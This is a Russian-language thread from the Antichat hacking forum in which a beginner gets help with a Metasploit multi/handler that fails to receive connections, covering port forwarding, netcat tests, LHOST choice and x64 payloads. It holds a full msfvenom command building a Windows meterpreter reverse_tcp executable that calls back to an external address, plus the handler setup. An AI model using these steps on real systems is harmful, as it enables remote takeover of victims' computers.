Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Проблема с Metasploit (https://forum.antichat.xyz/showthread.php?t=460335)

Vovo4ka 09.02.2018 16:29

Доброго времени суток. Возникла проблема с Metasploit'oм. Хотя, если задуматься, то виноват вовсе не он.

Дело в том, что порт 4444 (как, впрочем, и все остальные) закрыт и занят неким krb524. Простая попытка открыть порт через iptables, разумеется, не дала ничего. Я, начитавшись информации про ошибку в Метасплоите, которая возникала из-за невозможности подключиться к порту 4444 в гугле, стал сетовать на роутер. Добавил на нем правило, пробросив этот порт. Однако ничего не изменилось.

Сам процесс krb524 я пытался убить, и... теперь nmap этот процесс всё ещё видит, а pgrep - нет. Думаю попробовать банально удалить эту утиллиту, но мне интересно, сталкивался ли кто-либо с подобным? И как исправлял?

Ах да, подобная трабла наблюдается у меня минимум на трех устройствах: ПК, ноутбук и телефон (!) с установленным termux.

dmax0fw 09.02.2018 18:55

Цитата:

Сообщение от Vovo4ka
Vovo4ka said:

Сам процесс krb524 я пытался убить, и... теперь nmap этот процесс всё ещё видит, а pgrep - нет

nmap его не видит, а просто сообщает какая служба обычно использует этот порт, не конкретно на твоей машине,а вообще

Цитата:

Сообщение от Vovo4ka
Vovo4ka said:

Простая попытка открыть порт через iptables, разумеется, не дала ничего

порт открывает программа, которая собирается с ним работать, iptables лишь разрешает или запрещает обращаться к этому порту

Цитата:

Сообщение от Vovo4ka
Vovo4ka said:

Дело в том, что порт 4444 (как, впрочем, и все остальные) закрыт и занят неким krb524

он не может быть закрыт и занят одновременно, если закрыт значит никто его не слушает, а если handler метасплоита всё же запущен, значит он слушает порт на другом интерфейсе

Vovo4ka 09.02.2018 19:00

Цитата:

Сообщение от dmax0fw
dmax0fw said:

он не может быть закрыт и занят одновременно, если закрыт значит никто его не слушает, а если handler метасплоита всё же запущен, значит он слушает порт только на интерфейсе localhost

То есть handler может работать только с локальными адресами?

dmax0fw 09.02.2018 19:10

Цитата:

Сообщение от Vovo4ka
Vovo4ka said:

То есть handler может работать только с локальными адресами?

нет

в твоём случае проблема скорее всего либо в фаерволе роутера или машины с метасплоитом либо сам метасплоит слушает какой-то другой интерфейс

Vovo4ka 09.02.2018 19:20

Цитата:

Сообщение от dmax0fw
dmax0fw said:

нет
в твоём случае проблема скорее всего либо в фаерволе роутера или машины с метасплоитом либо сам метасплоит слушает какой-то другой интерфейс

Ну, роутер отпадает: я пробросил порт 4444. Машины разные, сомневаюсь, что на всех одна и та же проблема с файрволом возможна. Значит, дело в самом Метасплоите. Хорошо, спасибо, буду разбираться

VY_CMa 09.02.2018 19:28

Цитата:

Сообщение от None
То есть handler может работать только с локальными адресами?

Он может работать даже с 0.0.0.0

lsof -i | grep 4444

Vovo4ka 09.02.2018 19:36

Цитата:

Сообщение от VY_CMa
VY_CMa said:

lsof -i | grep 4444

Код:

Code:
root@kali:~# lsof -i | grep 4444
root@kali:~#


VY_CMa 09.02.2018 20:21

Какой модуль используешь для запуска?

Vovo4ka 09.02.2018 20:25

Цитата:

Сообщение от VY_CMa
VY_CMa said:

Какой модуль используешь для запуска?

multi/handler

Jerri 10.02.2018 00:49

Цитата:

Сообщение от Vovo4ka
Vovo4ka said:

Пардон, если не так понял (ибо скрипткидди): multi/handler

pkill -9 ruby и после попробуй запускать.

Vovo4ka 10.02.2018 21:45

Цитата:

Сообщение от Jerri
Jerri said:

pkill -9 ruby и после попробуй запускать.

Не дало решительным образом ничего.

.SpoilerTarget" type="button">Spoiler

Код:

Code:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=109.---.--.--- LPORT=4444 -f exe R > /root/programm.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
root@kali:~# ls
Desktop  Documents  Downloads  programm.exe  Music  Pictures  Public  Templates  Videos
root@kali:~# pkill -9 ruby
root@kali:~# msfconsole
 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                            |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                User Name:          [  security    ]                        |
|                                                                              |
|                Password:          [              ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                  [ OK ]                                    |
|______________________________________________________________________________|
|                                                                              |
|                                                      https://metasploit.com |
|______________________________________________________________________________|

      =[ metasploit v4.16.15-dev                        ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler/
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 109.---.--.---
LHOST => 109.---.--.---
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit[*] Exploit running as background job 0.

[-] Handler failed to bind to 109.252.62.124:4444:-  -[*] Started reverse TCP handler on 0.0.0.0:4444
msf exploit(handler) > exit


dmax0fw 11.02.2018 05:26

ну во первых в exploit/handler не нужно устанавливать в качестве LHOST свой внешний ip в случае если ты за роутером, ибо внешний ip это ip роутера а не машины с kali

но это в принципе всё равно, так как он предупреждает тебя о невозможности забиндить порт на этом ip и биндит его на любом доступном ipv4 интрефейсе

а во вторых закрой все метасплоиты, сделай на машине с кали nc -lvp 4444 , и попробуй подключиться на этот порт например с другой машины с линуксом:nc 4444

если порт проброшен верно и не мешают фаерволы, то в kali увидишь успешный коннект

а дальше уже плясать от этого

Vovo4ka 11.02.2018 19:57

Цитата:

Сообщение от dmax0fw
dmax0fw said:

ну во первых в exploit/handler не нужно устанавливать в качестве LHOST свой внешний ip в случае если ты за роутером, ибо внешний ip это ip роутера а не машины с kali

А какой тогда? Или вы имеете в виду, что надо сидеть не через роутер?

Цитата:

Сообщение от dmax0fw
dmax0fw said:

а во вторых закрой все метасплоиты, сделай на машине с кали nc -lvp 4444 , и попробуй подключиться на этот порт например с другой машины с линуксом:nc 4444
если порт проброшен верно и не мешают фаерволы, то в kali увидишь успешный коннект

Что ж, похоже, порт проброшен неверно. Я запустил прослушку порта у себя на компьютере, и с телефона (через мобильный интернет, естессно) через Termux запустил netcat, который, немного подумав, радостно выдал Connection Timed Out.

Ладно, буду изучать в этом направлении подробней. Спасибо!

dmax0fw 11.02.2018 20:58

Цитата:

Сообщение от Vovo4ka
Vovo4ka said:

А какой тогда?

локальный ip машины на которой запущен метасплоит

вижу ты не совсем понимаешь суть проброса портов

когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip

метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов

ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит

Vovo4ka 11.02.2018 21:02

Цитата:

Сообщение от dmax0fw
dmax0fw said:

локальный ip машины на которой запущен метасплоит
вижу ты не совсем понимаешь суть проброса портов
когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip
метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов
ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит

Не, я понял уже) О том, что такое проброска портов, я уже знал) Просто голова последнее время совсем не работает) Спасибо

Vovo4ka 12.02.2018 20:35

Цитата:

Сообщение от dmax0fw
dmax0fw said:

локальный ip машины на которой запущен метасплоит
вижу ты не совсем понимаешь суть проброса портов
когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip
метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов
ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит

http://s1.radikale.ru/uploads/2018/2...d3194-full.png

Верно ли я настроил проброску?

Vovo4ka 12.02.2018 21:48

Есть! Handler запустился и работает (вроде как)! Спасибо! Посмотрю, будет ли нормально работать.

Vovo4ka 14.02.2018 21:27

Теперь возникает ещё одна проблема: несовместимость полученных в msfvenom файлов с Виндой 7. Не запускаются ни под какими предлогами. Возможности проверить на других машинах нет. С чем это может быть связано?

Sensoft 14.02.2018 22:03

разрядность винды какая ?

Vovo4ka 14.02.2018 22:06

Цитата:

Сообщение от Sensoft
Sensoft said:

разрядность винды какая ?

Скорее всего х64. сейчас посмотреть и сказать точно не могу, уточню позже.

Sensoft 14.02.2018 22:07

Цитата:

Сообщение от Vovo4ka
Vovo4ka said:

Скорее всего х64. сейчас посмотреть и сказать точно не могу, уточню позже.

если не 64 тогда скорей в этом

Vovo4ka 16.02.2018 16:43

Цитата:

Сообщение от Sensoft
Sensoft said:

если не 64 тогда скорей в этом

То есть не-х64 версии Windows он не может брать?

Sensoft 16.02.2018 16:49

Цитата:

Сообщение от Vovo4ka
Vovo4ka said:

То есть не-х64 версии Windows он не может брать?

я не помню

вроде как, а может и нет, загугли глянь

у меня 8.1 64x всё збс работает

Jerri 16.02.2018 19:38

Цитата:

Сообщение от Vovo4ka
Vovo4ka said:

То есть не-х64 версии Windows он не может брать?

-p /windows/meterpreter/reverse_tcp

-p /windows/x64/meterpreter/reverse_tcp

Vovo4ka 16.02.2018 21:28

Цитата:

Сообщение от Jerri
Jerri said:

-p /windows/meterpreter/reverse_tcp
-p /windows/x64/meterpreter/reverse_tcp

Merci!


Время: 16:37